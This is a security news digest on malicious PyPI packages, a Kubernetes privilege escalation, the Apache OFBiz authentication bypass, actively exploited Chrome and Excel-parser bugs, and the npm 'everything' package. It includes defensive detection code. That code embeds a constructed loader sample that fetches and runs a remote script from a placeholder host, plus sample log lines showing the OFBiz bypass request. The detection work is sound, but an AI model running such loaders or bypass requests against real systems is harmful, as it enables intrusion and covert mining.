Programmer’s Digest #64
12/27/2023-01/04/2024: 3 Malicious PyPI Packages, Privilege Escalation Flaw Impacting Kubernetes Service, Critical Zero-Day in Apache OFBiz ERP System And More.
1. Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners
Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. These packages, upon initial use, deploy a CoinMiner executable on Linux devices. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script (“unmi.sh”) that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process continues to run after exiting the session. Echoing the approach of the earlier ‘culturestreak’ package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL.
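The loader pattern described above (decode an embedded blob, fetch a stage from a remote URL at import time, detach it with nohup) can be caught before installation by scanning a package's __init__.py. The scanner below is an added example for this digest, not code from any of the packages or from PyPI; the sample __init__.py it scans is constructed, and its URL is a placeholder.

```python
import ast

# Constructed sample in the shape the item describes (decode, fetch "unmi.sh",
# run detached). The domain is a placeholder; this string is only parsed, never run.
SAMPLE_INIT = '''
import base64, subprocess, urllib.request
u = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdW5taS5zaA==").decode()
s = urllib.request.urlopen(u).read().decode()
subprocess.Popen("nohup sh -c '" + s + "' &", shell=True)
'''

BENIGN_INIT = '''
from .core import add, multiply
__all__ = ["add", "multiply"]
'''

# (module, function) pairs that have no business running when a package is imported.
SUSPICIOUS_CALLS = {
    ("base64", "b64decode"): "decodes an embedded blob (obfuscated stage)",
    ("urllib.request", "urlopen"): "fetches content from a remote URL",
    ("subprocess", "Popen"): "spawns a process",
    ("os", "system"): "spawns a shell",
}

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_init(source):
    """Return one finding per suspicious call or 'nohup' string literal.
    Limitation: aliases and `from x import y` are not resolved."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name:
                mod, _, func = name.rpartition(".")
                why = SUSPICIOUS_CALLS.get((mod, func))
                if why:
                    findings.append(f"line {node.lineno}: {name}() {why}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "nohup" in node.value:
                findings.append(f"line {node.lineno}: literal contains 'nohup' (detaches from the session)")
    return findings
```

Run it over every __init__.py in a downloaded sdist or wheel before the package is installed; a hit on an import-time fetch is the signal, not the miner binary itself.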
2. Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service
Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. An attacker who has compromised the Fluent Bit logging container could combine that access with the high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out “data theft, deploy malicious pods, and disrupt the cluster’s operations.” Successful exploitation hinges on the attacker having already compromised a Fluent Bit container by some other initial access method, such as a remote code execution flaw. A threat actor could use this access to gain privileged access to a Kubernetes cluster that has ASM enabled and then use ASM’s service account token to escalate their privileges by creating a new pod with cluster-admin privileges. By way of fixes, Google has removed Fluent Bit’s access to the service account tokens and re-architected the functionality of ASM to remove excessive role-based access control (RBAC) permissions.
3. Critical Zero-Day in Apache OFBiz ERP System Exposes Businesses to Attack
A new zero-day security flaw has been discovered in Apache OFBiz, an open-source Enterprise Resource Planning (ERP) system, that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month. CVE-2023-51467 could be triggered using empty and invalid USERNAME and PASSWORD parameters in an HTTP request to return an authentication success message, effectively circumventing the protection and enabling a threat actor to access otherwise unauthorized internal resources. The attack hinges on the fact that the parameter “requirePasswordChange” is set to “Y” (i.e., yes) in the URL, causing the authentication to be trivially bypassed regardless of the values passed in the username and password fields. It is imperative that users move quickly to secure their Apache OFBiz instances against the two vulnerabilities.
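Because the bypass rides on a client-supplied requirePasswordChange=Y alongside USERNAME and PASSWORD parameters in the URL, attempts are visible in ordinary web access logs. The detector below is an added example for this digest, not OFBiz code or a vendor signature; the log lines are constructed, and the /control/login path is a placeholder rather than the real endpoint.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in common log format. Paths are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Dec/2023:10:01:02 +0000] "GET /control/login?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512
203.0.113.5 - - [28/Dec/2023:10:01:03 +0000] "POST /control/login?USERNAME=alice&PASSWORD=secret HTTP/1.1" 200 812
198.51.100.9 - - [28/Dec/2023:10:02:10 +0000] "GET /control/main?requirePasswordChange=Y HTTP/1.1" 302 0
198.51.100.9 - - [28/Dec/2023:10:02:11 +0000] "GET /control/login?USERNAME=&PASSWORD=&requirePasswordChange=N HTTP/1.1" 401 0
198.51.100.9 - - [28/Dec/2023:10:02:12 +0000] "GET /control/login?USERNAME=x&PASSWORD=y&requirePasswordChange=Y HTTP/1.1" 200 512
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_bypass_attempt(target):
    """True when the query string sets requirePasswordChange=Y and also
    carries USERNAME and PASSWORD parameters (any value, including empty).
    The values do not matter for the bypass, so they are not inspected."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    flag = qs.get("requirePasswordChange", [""])[0].upper() == "Y"
    return flag and "USERNAME" in qs and "PASSWORD" in qs

def find_bypass_attempts(log_text):
    """Return (ip, timestamp, status) for every matching request.
    A 200 status on a hit suggests the instance is still unpatched.
    Parameters sent only in a POST body are not visible in access logs."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_bypass_attempt(m["target"]):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits
```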
4. CISA warns of actively exploited bugs in Chrome and Excel parsing library
The first issue that CISA added to its Known Exploited Vulnerabilities (KEV) catalog is CVE-2023-7101, a remote code execution vulnerability that affects versions 0.65 and older of the Spreadsheet::ParseExcel library. Spreadsheet::ParseExcel contains a remote code execution vulnerability due to passing unvalidated input from a file into a string-type “eval.” Specifically, the issue stems from the evaluation of Number format strings within the Excel parsing logic. One product using the open-source library is Barracuda ESG (Email Security Gateway), which was targeted in late December by Chinese hackers who exploited CVE-2023-7101 in Spreadsheet::ParseExcel to compromise appliances. The latest actively exploited vulnerability added to KEV is CVE-2023-7024, a heap buffer overflow issue in WebRTC in the Google Chrome web browser. Google Chromium WebRTC contains a heap buffer overflow vulnerability that allows an attacker to cause crashes or code execution. This vulnerability could impact web browsers using WebRTC, including but not limited to Google Chrome. The flaw was discovered by Google’s Threat Analysis Group (TAG) and received a fix via an emergency update on December 20, in versions 120.0.6099.129/130 for Windows and 120.0.6099.129 for Mac and Linux.
5. ‘everything’ blocks devs from removing their own npm packages
Over the holidays, the npm package registry was flooded with more than 3,000 packages, including one called “everything,” and others named a variation of the word. Installing “everything” would merely exhaust your computer’s storage and slow it down, but the package’s mere existence on npmjs.com prevents authors who have no connection to it whatsoever from unpublishing their own packages from the world’s largest JavaScript software registry. The “everything” package has just 5 sub-packages, published under the “@everything-registry” scope, listed as its dependencies. These 5 packages, however, gradually manage to pull in every single package present on the entire registry as a dependency. For example, “everything” pulls in “@everything-registry/chunk-2,” which may further attempt to pull in several other packages by the same author, such as “@everything-registry/sub-chunk-1623.” Each of these sub-packages (or “chunks,” as the author calls them) ultimately includes about 800 npm projects as dependencies. The problem is that since “everything” relies on every package (including yours), your package gets stuck, and there is some unknown package preventing you from removing it.
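The chunk fan-out and the resulting unpublish block can be reproduced on a small dependency graph. The code below is an added example for this digest, not npm's own tooling; the registry is a constructed toy with a handful of packages (the real one has about 3,000 chunk packages), and it models only the rule the item describes, that a package with dependents cannot be unpublished, not the registry's other unpublish conditions.

```python
from collections import deque

# Constructed toy registry: package -> direct dependencies. Names mirror the
# item's description; "my-package" stands in for an unrelated author's package.
REGISTRY = {
    "everything": ["@everything-registry/chunk-1", "@everything-registry/chunk-2"],
    "@everything-registry/chunk-1": ["@everything-registry/sub-chunk-1",
                                     "@everything-registry/sub-chunk-2"],
    "@everything-registry/chunk-2": ["@everything-registry/sub-chunk-3"],
    "@everything-registry/sub-chunk-1": ["left-pad", "is-odd"],
    "@everything-registry/sub-chunk-2": ["my-package", "is-odd"],
    "@everything-registry/sub-chunk-3": ["another-lib"],
    "left-pad": [], "is-odd": ["is-number"], "is-number": [],
    "my-package": [], "another-lib": [],
}

def transitive_deps(registry, name):
    """Every package reachable from `name` along dependency edges (BFS)."""
    seen, queue = set(), deque([name])
    while queue:
        for dep in registry.get(queue.popleft(), []):
            if dep not in seen:
                seen.add(dep)
                queue.append(dep)
    return seen

def dependents(registry, name):
    """Packages that list `name` as a direct dependency (reverse edges)."""
    return sorted(p for p, deps in registry.items() if name in deps)

def can_unpublish(registry, name):
    """Dependents rule only: removable iff nothing on the registry depends on it."""
    return not dependents(registry, name)

def without(registry, names):
    """Registry as it would look if `names` had never been published."""
    return {p: [d for d in deps if d not in names]
            for p, deps in registry.items() if p not in names}

# The 'everything' root plus everything under its scope, for before/after checks.
EVERYTHING_SET = {"everything"} | {p for p in REGISTRY if p.startswith("@everything-registry/")}
```

Swap the toy dictionary for real data (the `dependencies` map of each package's manifest) and `dependents` tells you which chunk is holding your package in place.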